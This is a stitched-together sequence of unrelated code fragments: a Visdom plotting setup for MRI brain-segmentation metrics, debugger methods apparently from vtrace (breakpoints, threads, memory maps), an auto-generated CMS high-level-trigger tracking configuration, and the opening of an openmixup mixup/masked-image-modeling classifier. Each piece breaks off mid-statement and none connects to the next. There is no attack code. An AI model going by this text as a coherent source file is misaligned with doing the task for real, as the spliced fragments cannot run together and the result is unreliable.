params={"opts": {"title": "Background Input Intensity Histogram",
"store_history": True,
"numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "CSF Input Intensity Histogram", PlotType.HISTOGRAM_PLOT,
params={"opts": {"title": "CSF Input Intensity Histogram",
"store_history": True,
"numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "GM Input Intensity Histogram", PlotType.HISTOGRAM_PLOT,
params={"opts": {"title": "GM Input Intensity Histogram",
"store_history": True,
"numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "WM Input Intensity Histogram", PlotType.HISTOGRAM_PLOT,
params={"opts": {"title": "WM Input Intensity Histogram",
"store_history": True,
"numbins": 128}}, every=100), Event.ON_TEST_BATCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "Mean Hausdorff Distance", PlotType.LINE_PLOT,
params={"opts": {"title": "Mean Hausdorff Distance",
"legend": ["Test"]}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "Metric Table", PlotType.TEXT_PLOT,
params={"opts": {"title": "Metric Table"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "Per-Dataset Metric Table", PlotType.TEXT_PLOT,
params={"opts": {"title": "Per-Dataset Metric Table"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "Confusion Matrix", PlotType.HEATMAP_PLOT,
params={
"opts": {"columnnames": ["VM", "GM", "CSF", "Background"],
"rownames": ["Background", "CSF", "GM", "WM"],
"title": "Confusion Matrix"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(PlotCustomVariables(visdom_logger, "iSEG Confusion Matrix", PlotType.HEATMAP_PLOT,
params={
"opts": {"columnnames": ["VM", "GM", "CSF", "Background"],
"rownames": ["Background", "CSF", "GM", "WM"],
"title": "iSEG Confusion Matrix"}},
every=1), Event.ON_TEST_EPOCH_END) \
.with_event_handler(
PlotCustomVariables(visdom_logger, "MRBrainS Confusion Matrix", PlotType.HEATMAP_PLOT,
params={"opts": {"columnnames": ["VM", "GM", "CSF", "Background"],
"rownames": ["Background", | |
method on return'd breakpoint objects as they may be remote
and would then be *coppies* of the bp objects. (use the trace's
setBreakpointCode() instead).
"""
return self.bpbyid.get(id)
def getBreakpointByAddr(self, va):
    """
    Look up the breakpoint registered at the given virtual address.
    Returns the breakpoint object, or None when no breakpoint lives there.
    """
    found = self.breakpoints.get(va)
    return found
def getBreakpoints(self):
    """
    Return the collection of currently registered breakpoint objects
    (keyed internally by breakpoint id).
    """
    return self.bpbyid.values()
def getBreakpointEnabled(self, bpid):
    """
    Accessor returning whether the breakpoint with the given id is
    currently enabled.

    NOTE: code which wants to be remote-safe should use this
    """
    bpoint = self.getBreakpoint(bpid)
    if bpoint is not None:
        return bpoint.isEnabled()
    raise Exception("Breakpoint %d Not Found" % bpid)
def setBreakpointEnabled(self, bpid, enabled=True):
    """
    Accessor to enable/disable a breakpoint by id.

    NOTE: code which wants to be remote-safe should use this
    """
    bpoint = self.getBreakpoint(bpid)
    if bpoint is None:
        raise Exception("Breakpoint %d Not Found" % bpid)
    if not enabled:
        # Deactivate first to catch the "disable" of fastbreaks...
        bpoint.deactivate(self)
    return bpoint.setEnabled(enabled)
def setBreakpointCode(self, bpid, pystr):
    """
    Attach a string of python source to the breakpoint with the given id.

    Breakpoints may live in a remote debugger process, and code objects
    are not pickleable, so the vdb interface passes python *source*
    strings which run on the breakpoint's side when it is hit.
    """
    bpoint = self.getBreakpoint(bpid)
    if bpoint is None:
        raise Exception("Breakpoint %d Not Found" % bpid)
    bpoint.setBreakpointCode(pystr)
def getBreakpointCode(self, bpid):
    """
    Return the user-specified python source string that runs when the
    breakpoint with the given id is hit, or None for an unknown id.
    """
    bpoint = self.getBreakpoint(bpid)
    return bpoint.getBreakpointCode() if bpoint is not None else None
def call(self, address, args, convention=None):
    """
    Set up the "stack" and call the target *address* with *args*.
    String/buffer arguments are copied into target memory and handed
    in by reference.  Returns a dictionary of ALL register values as
    they were when the call returned.

    An optional *convention* name may be supplied for platforms that
    can interpret a specific calling convention.
    """
    self.requireNotRunning()
    return self.platformCall(address, args, convention)
def registerNotifier(self, event, notifier):
    """
    Register a notifier to be called back for the given event.
    See the NOTIFY_* constants for handler hooks.

    The per-event list is created on first use; the original
    open-coded branch (get / append / re-assign) is replaced with
    dict.setdefault, which produces the same final mapping in a
    single lookup.
    """
    self.notifiers.setdefault(event, []).append(notifier)
def deregisterNotifier(self, event, notifier):
    """
    Remove a previously registered notifier for the given event.
    Unknown event/notifier combinations are silently ignored.
    """
    try:
        self.notifiers.get(event, []).remove(notifier)
    except ValueError:
        pass
def getNotifiers(self, event):
    """Return the (possibly empty) notifier list for the given event."""
    registered = self.notifiers.get(event, [])
    return registered
def requireNotExited(self):
    '''
    Guard helper: raise when the trace's target process has exited.
    '''
    if not self.exited:
        return
    raise Exception('ERROR - Request invalid for trace which exited')
def requireNotRunning(self):
    '''
    Guard helper: raise unless the debugger is attached and the
    target process is currently stopped.
    '''
    self.requireAttached()
    if not self.isRunning():
        return
    raise Exception('ERROR - trace is running; use "break" before running the specified command')
def requireAttached(self):
    '''
    Guard helper: raise unless the debugger is attached to a process.
    '''
    if self.attached:
        return
    raise Exception('ERROR - attach to a process first')
def getFds(self):
    """
    Return a list of (fd, type, bestname) tuples for the target
    process.  This is mostly useful for human consumption.
    The platform result is cached until invalidated.
    """
    self.requireNotRunning()
    cached = self.fds
    if not cached:
        cached = self.platformGetFds()
        self.fds = cached
    return cached
def getMemoryMaps(self):
    """
    Return a list of (addr, len, perms, file) tuples describing the
    memory currently mapped in the target process.  The data comes
    from the platform's platformGetMaps() mixin and is cached until
    the next CONTINUE.
    """
    self.requireNotRunning()
    cached = self.mapcache
    if not cached:
        cached = self.platformGetMaps()
        self.mapcache = cached
    return cached
def getMemoryFault(self):
    '''
    If the most recent event was a memory access error, return an
    (addr, perm) tuple on supported platforms.  Otherwise the result
    is (None, None).

    Example:
        import envi.memory as e_mem
        vaddr, vperm = trace.getMemoryFault()
        if vaddr is not None:
            print('Memory Fault At: 0x%.8x (perm: %d)' % (vaddr, vperm))
    '''
    return self.platformGetMemFault()
def isAttached(self):
    '''
    Whether this trace is currently attached to its target process.
    '''
    return self.attached
def isRunning(self):
    '''
    Whether this trace's target process is currently running.
    '''
    return self.running
def hasExited(self):
    '''
    Whether this trace's target process has already exited.
    '''
    return self.exited
def isRemote(self):
    '''
    Whether this trace is a CobraProxy object to a trace running on
    another system.  The local implementation always answers False.
    '''
    return False
def enableAutoContinue(self, event):
    """
    Put the tracer into AutoContinue mode for the given event.
    To make *all* events continue running, see RunForever mode
    in setMode().  Re-enabling an event is a no-op.
    """
    if event in self.auto_continue:
        return
    self.auto_continue.append(event)
def disableAutoContinue(self, event):
    """
    Turn off AutoContinue for the given event (no-op when the event
    was not enabled).
    """
    try:
        self.auto_continue.remove(event)
    except ValueError:
        pass
def getAutoContinueList(self):
    """
    Return a copy of the list of vtrace notification events that
    will be auto-continued.
    """
    return self.auto_continue[:]
def parseExpression(self, expression):
    """
    Parse a python expression with many useful helpers mapped
    into the execution namespace.

    Example: trace.parseExpression("ispoi(ecx+ntdll.RtlAllocateHeap)")
    """
    # Build the eval namespace seeded with trace-aware helpers
    # (registers, symbols, etc.) for this trace instance.
    locs = VtraceExpressionLocals(self)
    # NOTE: long() is Python 2 only -- this module targets py2; the
    # evaluated result is coerced to an integer for the caller.
    return long(e_expr.evaluate(expression, locs))
def sendBreak(self):
    """
    Send an asynchronous break signal to the target process.
    This is only valid if the target is actually running...
    """
    self.requireAttached()
    # Leave RunForever mode so the requested stop actually sticks.
    self.setMode("RunForever", False)
    # Flag the event loop that this stop was requested by us.
    self.setMeta("ShouldBreak", True)
    self.platformSendBreak()
    # Give the platform a moment to deliver the break.
    time.sleep(0.01)
    # If we're non-blocking, we gotta wait...
    if self.getMode("NonBlocking", True):
        while self.isRunning():
            time.sleep(0.01)
def getStackTrace(self):
    """
    Return a list of (instruction pointer, stack frame) tuples.
    When stack tracing fails, the error entry is (-1, -1); most
    platforms report (0, 0) for the top stack frame.
    """
    # FIXME thread id argument!
    return self.archGetStackTrace()
def getThreads(self):
    """
    Return a dict of <threadid>:<tinfo> pairs.  The tinfo value is
    platform dependent -- typically the top of the stack for the
    thread, or the TEB on win32.  The platform result is cached.
    """
    cached = self.threadcache
    if not cached:
        cached = self.platformGetThreads()
        self.threadcache = cached
    return cached
def getCurrentThread(self):
    '''
    Return the thread id of the currently selected thread.
    '''
    return self.getMeta('ThreadId')
def selectThread(self, threadid):
    """
    Set the "current thread" context to the given thread id.
    (For example stack traces and register values will depend
    on the current thread context).  By default the thread
    responsible for an "interesting event" is selected.

    Fix: requireNotRunning() now runs *before* the thread-id
    validation -- the original queried getThreads() (which may hit
    the platform layer) while the trace could still be running.
    """
    self.requireNotRunning()
    if threadid not in self.getThreads():
        raise Exception("ERROR: Invalid threadid chosen: %d" % threadid)
    self.platformSelectThread(threadid)
    self.setMeta("ThreadId", threadid)
def isThreadSuspended(self, threadid):
    """
    Answer whether the given thread id is currently suspended.
    """
    return self.sus_threads.get(threadid, False)
def suspendThread(self, threadid):
    """
    Suspend a thread by id.  On the next continue of the trace, the
    suspended thread will not be scheduled.

    Raises when the thread is already suspended or does not exist.
    (Idiom fix: membership test no longer materializes .keys().)
    """
    self.requireNotRunning()
    if self.sus_threads.get(threadid):
        raise Exception("The specified thread is already suspended")
    if threadid not in self.getThreads():
        raise Exception("There is no thread %d!" % threadid)
    self.platformSuspendThread(threadid)
    self.sus_threads[threadid] = True
def resumeThread(self, threadid):
    """
    Resume a thread previously suspended with suspendThread().
    Raises when the given thread is not currently suspended.
    """
    self.requireNotRunning()
    if self.sus_threads.get(threadid):
        self.platformResumeThread(threadid)
        self.sus_threads.pop(threadid)
        return
    raise Exception("The specified thread is not suspended")
def injectThread(self, pc):
    """
    Create a new thread inside the target process.  This thread
    will begin execution on the next process run().

    NOTE: currently a stub -- the platform hook below is commented
    out, so this call only validates trace state and does nothing.
    """
    self.requireNotRunning()
    #self.platformInjectThread(pc)
    pass
def joinThread(self, threadid):
    '''
    Run the trace in a loop until the given thread exits.
    '''
    self.setMode('RunForever', True)
    self._join_thread = threadid
    # Force blocking run/wait for the duration, then restore the
    # caller's NonBlocking setting.
    saved_nonblocking = self.getMode('NonBlocking')
    self.setMode('NonBlocking', False)
    self.run()
    self.setMode('NonBlocking', saved_nonblocking)
def getStructNames(self, namespace=None):
    '''
    Return the structure names within *namespace*, or the list of
    known namespaces when no namespace is given.

    Example: namespaces = trace.getStructNames()
             ntdll_structs = trace.getStructNames(namespace='ntdll')
    '''
    if not namespace:
        return self.vsbuilder.getVStructNamespaceNames()
    return self.vsbuilder.getVStructNames(namespace=namespace)
def getStruct(self, sname, va=None):
    """
    Retrieve a vstruct structure optionally populated with memory from
    the specified address. Returns a standard vstruct object.
    """
    # Check if we need to parse symbols for a library
    libbase = sname.split('.')[0]
    self._loadBinaryNorm(libbase)
    # Prefer per-binary namespaces built from parsed symbols.
    if self.vsbuilder.hasVStructNamespace(libbase):
        vs = self.vsbuilder.buildVStruct(sname)
    # FIXME this is deprecated and should die...
    else:
        vs = vstruct.getStructure(sname)
    if vs is None:
        return None
    if va is None:
        # No address given: hand back the empty structure definition.
        return vs
    # Populate the structure from target memory at va.
    bytez = self.readMemory(va, len(vs))
    vs.vsParse(bytez)
    return vs
def setVariable(self, name, value):
"""
Set a named variable in the trace which may be used in
subsequent VtraceExpressions.
Example:
trace.setVariable("whereiam", trace.getProgramCounter())
"""
self.localvars[name] = | |
# /dev/CMSSW_8_0_0/GRun/V135 (CMSSW_8_0_12)
import FWCore.ParameterSet.Config as cms
# NOTE(review): this section is auto-generated HLT configuration dumped
# from the CMS ConfDB (table /dev/CMSSW_8_0_0/GRun/V135); edit the
# values in ConfDB rather than by hand.
HLTConfigVersion = cms.PSet(
    tableName = cms.string('/dev/CMSSW_8_0_0/GRun/V135')
)

# --- Initial step: CkfBaseTrajectoryFilter / GroupedCkfTrajectoryBuilder ---
HLTPSetInitialStepTrajectoryFilterBase = cms.PSet(
    ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
    minimumNumberOfHits = cms.int32( 3 ),
    chargeSignificance = cms.double( -1.0 ),
    minPt = cms.double( 0.2 ),
    nSigmaMinPt = cms.double( 5.0 ),
    minHitsMinPt = cms.int32( 3 ),
    maxLostHits = cms.int32( 999 ),
    maxConsecLostHits = cms.int32( 1 ),
    maxNumberOfHits = cms.int32( 100 ),
    maxLostHitsFraction = cms.double( 0.1 ),
    constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
    minNumberOfHitsPerLoop = cms.int32( 4 ),
    extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
    minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
    maxCCCLostHits = cms.int32( 2 ),
    seedExtension = cms.int32( 0 ),
    strictSeedExtension = cms.bool( False ),
    seedPairPenalty = cms.int32( 0 ),
    minNumberOfHitsForLoopers = cms.int32( 13 )
)
HLTPSetInitialStepTrajectoryBuilder = cms.PSet(
    ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
    bestHitOnly = cms.bool( True ),
    propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
    trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilter" ) ),
    inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilter" ) ),
    useSameTrajFilter = cms.bool( True ),
    maxCand = cms.int32( 3 ),
    intermediateCleaning = cms.bool( True ),
    lostHitPenalty = cms.double( 30.0 ),
    MeasurementTrackerName = cms.string( "" ),
    lockHits = cms.bool( True ),
    TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
    foundHitBonus = cms.double( 5.0 ),
    updator = cms.string( "hltESPKFUpdator" ),
    alwaysUseInvalidHits = cms.bool( True ),
    requireSeedHitsInRebuild = cms.bool( True ),
    keepOriginalIfRebuildFails = cms.bool( False ),
    estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
    propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
    minNrOfHitsForRebuild = cms.int32( 5 ),
    maxDPhiForLooperReconstruction = cms.double( 2.0 ),
    maxPtForLooperReconstruction = cms.double( 0.7 )
)

# --- Detached step (lower minPt than the initial step) ---
HLTPSetDetachedStepTrajectoryFilterBase = cms.PSet(
    ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
    minimumNumberOfHits = cms.int32( 3 ),
    chargeSignificance = cms.double( -1.0 ),
    minPt = cms.double( 0.075 ),
    nSigmaMinPt = cms.double( 5.0 ),
    minHitsMinPt = cms.int32( 3 ),
    maxLostHits = cms.int32( 999 ),
    maxConsecLostHits = cms.int32( 1 ),
    maxNumberOfHits = cms.int32( 100 ),
    maxLostHitsFraction = cms.double( 0.1 ),
    constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
    minNumberOfHitsPerLoop = cms.int32( 4 ),
    extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
    minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
    maxCCCLostHits = cms.int32( 2 ),
    seedExtension = cms.int32( 0 ),
    strictSeedExtension = cms.bool( False ),
    seedPairPenalty = cms.int32( 0 ),
    minNumberOfHitsForLoopers = cms.int32( 13 )
)
HLTPSetDetachedStepTrajectoryBuilder = cms.PSet(
    ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
    bestHitOnly = cms.bool( True ),
    propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
    trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedStepTrajectoryFilter" ) ),
    inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedStepTrajectoryFilter" ) ),
    useSameTrajFilter = cms.bool( True ),
    maxCand = cms.int32( 3 ),
    intermediateCleaning = cms.bool( True ),
    lostHitPenalty = cms.double( 30.0 ),
    MeasurementTrackerName = cms.string( "" ),
    lockHits = cms.bool( True ),
    TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
    foundHitBonus = cms.double( 5.0 ),
    updator = cms.string( "hltESPKFUpdator" ),
    alwaysUseInvalidHits = cms.bool( False ),
    requireSeedHitsInRebuild = cms.bool( True ),
    keepOriginalIfRebuildFails = cms.bool( False ),
    estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
    propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
    minNrOfHitsForRebuild = cms.int32( 5 ),
    maxDPhiForLooperReconstruction = cms.double( 2.0 ),
    maxPtForLooperReconstruction = cms.double( 0.7 )
)

# --- Pixel-pair step ---
HLTPSetPixelPairStepTrajectoryFilterBase = cms.PSet(
    ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
    minimumNumberOfHits = cms.int32( 3 ),
    chargeSignificance = cms.double( -1.0 ),
    minPt = cms.double( 0.1 ),
    nSigmaMinPt = cms.double( 5.0 ),
    minHitsMinPt = cms.int32( 3 ),
    maxLostHits = cms.int32( 999 ),
    maxConsecLostHits = cms.int32( 1 ),
    maxNumberOfHits = cms.int32( 100 ),
    maxLostHitsFraction = cms.double( 0.1 ),
    constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
    minNumberOfHitsPerLoop = cms.int32( 4 ),
    extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
    minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
    maxCCCLostHits = cms.int32( 2 ),
    seedExtension = cms.int32( 0 ),
    strictSeedExtension = cms.bool( False ),
    seedPairPenalty = cms.int32( 0 ),
    minNumberOfHitsForLoopers = cms.int32( 13 )
)
HLTPSetPixelPairStepTrajectoryBuilder = cms.PSet(
    ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
    bestHitOnly = cms.bool( True ),
    propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
    trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilter" ) ),
    inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilter" ) ),
    useSameTrajFilter = cms.bool( True ),
    maxCand = cms.int32( 3 ),
    intermediateCleaning = cms.bool( True ),
    lostHitPenalty = cms.double( 30.0 ),
    MeasurementTrackerName = cms.string( "" ),
    lockHits = cms.bool( True ),
    TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
    foundHitBonus = cms.double( 5.0 ),
    updator = cms.string( "hltESPKFUpdator" ),
    alwaysUseInvalidHits = cms.bool( True ),
    requireSeedHitsInRebuild = cms.bool( True ),
    keepOriginalIfRebuildFails = cms.bool( False ),
    estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
    propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
    minNrOfHitsForRebuild = cms.int32( 5 ),
    maxDPhiForLooperReconstruction = cms.double( 2.0 ),
    maxPtForLooperReconstruction = cms.double( 0.7 )
)

# --- Mixed step (no lost hits allowed, looser charge cut) ---
HLTPSetMixedStepTrajectoryFilterBase = cms.PSet(
    ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
    minimumNumberOfHits = cms.int32( 3 ),
    seedPairPenalty = cms.int32( 0 ),
    chargeSignificance = cms.double( -1.0 ),
    minPt = cms.double( 0.05 ),
    nSigmaMinPt = cms.double( 5.0 ),
    minHitsMinPt = cms.int32( 3 ),
    maxLostHits = cms.int32( 0 ),
    maxConsecLostHits = cms.int32( 1 ),
    maxNumberOfHits = cms.int32( 100 ),
    maxLostHitsFraction = cms.double( 0.1 ),
    constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
    minNumberOfHitsPerLoop = cms.int32( 4 ),
    extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
    minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
    maxCCCLostHits = cms.int32( 9999 ),
    seedExtension = cms.int32( 0 ),
    strictSeedExtension = cms.bool( False ),
    minNumberOfHitsForLoopers = cms.int32( 13 )
)
HLTPSetMixedStepTrajectoryBuilder = cms.PSet(
    ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
    bestHitOnly = cms.bool( True ),
    propagatorAlong = cms.string( "PropagatorWithMaterialForMixedStep" ),
    trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedStepTrajectoryFilter" ) ),
    inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedStepTrajectoryFilter" ) ),
    useSameTrajFilter = cms.bool( True ),
    maxCand = cms.int32( 2 ),
    intermediateCleaning = cms.bool( True ),
    lostHitPenalty = cms.double( 30.0 ),
    MeasurementTrackerName = cms.string( "" ),
    lockHits = cms.bool( True ),
    TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
    foundHitBonus = cms.double( 5.0 ),
    updator = cms.string( "hltESPKFUpdator" ),
    alwaysUseInvalidHits = cms.bool( True ),
    requireSeedHitsInRebuild = cms.bool( True ),
    keepOriginalIfRebuildFails = cms.bool( False ),
    estimator = cms.string( "hltESPChi2ChargeTightMeasurementEstimator16" ),
    propagatorOpposite = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ),
    minNrOfHitsForRebuild = cms.int32( 5 ),
    maxDPhiForLooperReconstruction = cms.double( 2.0 ),
    maxPtForLooperReconstruction = cms.double( 0.7 )
)

# --- Pixel-less step (requires 4 hits; different lost-hits constant) ---
HLTPSetPixelLessStepTrajectoryFilterBase = cms.PSet(
    ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
    minimumNumberOfHits = cms.int32( 4 ),
    chargeSignificance = cms.double( -1.0 ),
    minPt = cms.double( 0.05 ),
    nSigmaMinPt = cms.double( 5.0 ),
    minHitsMinPt = cms.int32( 3 ),
    maxLostHits = cms.int32( 0 ),
    maxConsecLostHits = cms.int32( 1 ),
    maxNumberOfHits = cms.int32( 100 ),
    maxLostHitsFraction = cms.double( 0.1 ),
    constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
    minNumberOfHitsPerLoop = cms.int32( 4 ),
    extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
    minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
    maxCCCLostHits = cms.int32( 9999 ),
    seedExtension = cms.int32( 0 ),
    strictSeedExtension = cms.bool( False ),
    minNumberOfHitsForLoopers = cms.int32( 13 ),
    seedPairPenalty = cms.int32( 0 )
)
HLTPSetPixelLessStepTrajectoryBuilder = cms.PSet(
    ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
    bestHitOnly = cms.bool( True ),
    propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
    trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilter" ) ),
    inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilter" ) ),
    useSameTrajFilter = cms.bool( True ),
    maxCand = cms.int32( 2 ),
    intermediateCleaning = cms.bool( True ),
    lostHitPenalty = cms.double( 30.0 ),
    MeasurementTrackerName = cms.string( "" ),
    lockHits = cms.bool( True ),
    TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
    foundHitBonus = cms.double( 5.0 ),
    updator = cms.string( "hltESPKFUpdator" ),
    alwaysUseInvalidHits = cms.bool( False ),
    requireSeedHitsInRebuild = cms.bool( True ),
    keepOriginalIfRebuildFails = cms.bool( False ),
    estimator = cms.string( "hltESPChi2ChargeTightMeasurementEstimator16" ),
    propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
    minNrOfHitsForRebuild = cms.int32( 4 ),
    maxDPhiForLooperReconstruction = cms.double( 2.0 ),
    maxPtForLooperReconstruction = cms.double( 0.7 )
)
transferSystem = cms.PSet(
destinations = cms.vstring( 'Tier0',
'DQM',
'ECAL',
'EventDisplay',
'Lustre',
'None' ),
transferModes = cms.vstring( 'default',
'test',
'emulator' ),
streamA = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'Lustre' )
),
streamCalibration = cms.PSet(
default = cms.vstring( 'Tier0' ),
test = cms.vstring( 'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamDQM = cms.PSet(
default = cms.vstring( 'DQM' ),
test = cms.vstring( 'DQM',
'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamDQMCalibration = cms.PSet(
default = cms.vstring( 'DQM' ),
test = cms.vstring( 'DQM',
'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamEcalCalibration = cms.PSet(
default = cms.vstring( 'ECAL' ),
test = cms.vstring( 'ECAL' ),
emulator = cms.vstring( 'None' )
),
streamEventDisplay = cms.PSet(
default = cms.vstring( 'EventDisplay',
'Tier0' ),
test = cms.vstring( 'EventDisplay',
'Lustre' ),
emulator = cms.vstring( 'None' )
),
streamExpressCosmics = cms.PSet(
default = cms.vstring( 'Tier0' ),
test | |
<reponame>Westlake-AI/openmixup<gh_stars>1-10
import random
import numpy as np
import torch
from torch.autograd import Variable
import torch.nn.functional as F
from openmixup.utils import force_fp32, print_log
from openmixup.models.utils import Canny, Laplacian, Sobel
from .base_model import BaseModel
from .. import builder
from ..registry import MODELS
from ..utils import (cutmix, fmix, mixup, resizemix, saliencymix, smoothmix,
attentivemix, puzzlemix, PlotTensor)
@MODELS.register_module
class MIMClassification(BaseModel):
"""Image Classification with Mixups and MIM.
Args:
backbone (dict): Config dict for module of backbone ConvNet.
neck_cls (dict): Config dict for neck of classification pooling.
neck_mim (dict): Config dict for neck of masked image modeling (MIM) decoder.
head_cls (dict): Config dict for head of classification loss functions.
head_mim (dict): Config dict for head of MIM loss functions.
backbone_k (dict): Config dict for pre-trained backbone. Default: None.
mim_target (None or str): Mode of MIM target. Default: None.
alpha (float or list): To sample Beta distribution in MixUp methods. Build a
list for various mixup methods. Default: 1.
mix_mode (str or list): Basice mixUp methods in input space. Similarly, build
a list for various mix_mode, and randomly choose one mix_mode for each iter.
Default: "mixup".
mix_args (dict): Args for manifoldmix, resizeMix, fmix mode.
mix_prob (list): List of applying prob for given mixup modes. Default: None.
mix_repeat (bool or int): How many time to repeat mixup within a mini-batch. If
mix_repeat > 1, mixup with different alpha and shuffle idx. Default: False.
pretrained (str, optional): Path to pre-trained weights. Default: None.
pretrained_k (str, optional): Path to pre-trained weights for backbone_k.
Default: None.
loss_weights (dict): Loss weights of classification and MIM losses.
"""
def __init__(self,
             backbone,
             neck_cls=None,
             neck_mim=None,
             head_cls=None,
             head_mim=None,
             backbone_k=None,
             mim_target=None,
             residual=False,
             alpha=1.0,
             mix_mode="mixup",
             mix_args=None,
             mix_prob=None,
             mix_repeat=False,
             momentum_k=-1,
             pretrained=None,
             pretrained_k=None,
             save_name="MIMcls",
             loss_weights=None,
             init_cfg=None,
             **kwargs):
    """Build the networks, MIM target extractor and mixup settings.

    Fixes relative to the original:
      * ``mix_args`` and ``loss_weights`` used mutable dict defaults that
        were stored on ``self`` (and ``loss_weights`` is mutated below),
        so the default objects were shared across instances.  They are
        now ``None`` sentinels expanded per instance with the same
        effective defaults.
      * the ``mix_prob`` sanity assert compared ``abs(sum - 1e-10) <= 1``
        (accepting almost any sum); it now checks that the probabilities
        sum to 1 within 1e-10, as clearly intended.
      * ``mix_prob`` is copied before the in-place cumulative-sum pass so
        the caller's list is not mutated.
    """
    super(MIMClassification, self).__init__(init_cfg, **kwargs)
    # per-instance defaults (avoid shared mutable default arguments)
    if mix_args is None:
        mix_args = dict(
            attentivemix=dict(grid_size=32, top_k=6, beta=8),
            automix=dict(mask_adjust=0, lam_margin=0),
            fmix=dict(decay_power=3, size=(32,32), max_soft=0., reformulate=False),
            manifoldmix=dict(layer=(0, 3)),
            puzzlemix=dict(transport=True, t_batch_size=None, block_num=5, beta=1.2,
                gamma=0.5, eta=0.2, neigh_size=4, n_labels=3, t_eps=0.8, t_size=4),
            resizemix=dict(scope=(0.1, 0.8), use_alpha=True),
            samix=dict(mask_adjust=0, lam_margin=0.08),
        )
    if loss_weights is None:
        loss_weights = dict(decent_weight=[], accent_weight=[],
                            weight_mim=1, weight_cls=1,)
    # networks
    self.backbone = builder.build_backbone(backbone)
    assert isinstance(neck_cls, dict) and isinstance(neck_mim, dict)
    self.neck_cls = builder.build_neck(neck_cls)
    self.neck_mim = builder.build_neck(neck_mim)
    assert isinstance(head_cls, dict) and isinstance(head_mim, dict)
    self.head_cls = builder.build_head(head_cls)
    self.head_mim = builder.build_head(head_mim)
    self.head = self.head_cls
    self.backbone_k = None
    self.momentum_k = momentum_k
    if backbone_k is not None:
        self.backbone_k = builder.build_backbone(backbone_k)
        for param in self.backbone_k.parameters():  # stop grad k
            param.requires_grad = False
        self.momentum_k = min(momentum_k, 1)
    # mim targets
    self.mim_target = mim_target
    self.residual = residual
    assert self.mim_target in [None, 'canny', 'hog', 'laplacian', 'lbp', 'pretrained', 'sobel',]
    if self.mim_target == 'canny':
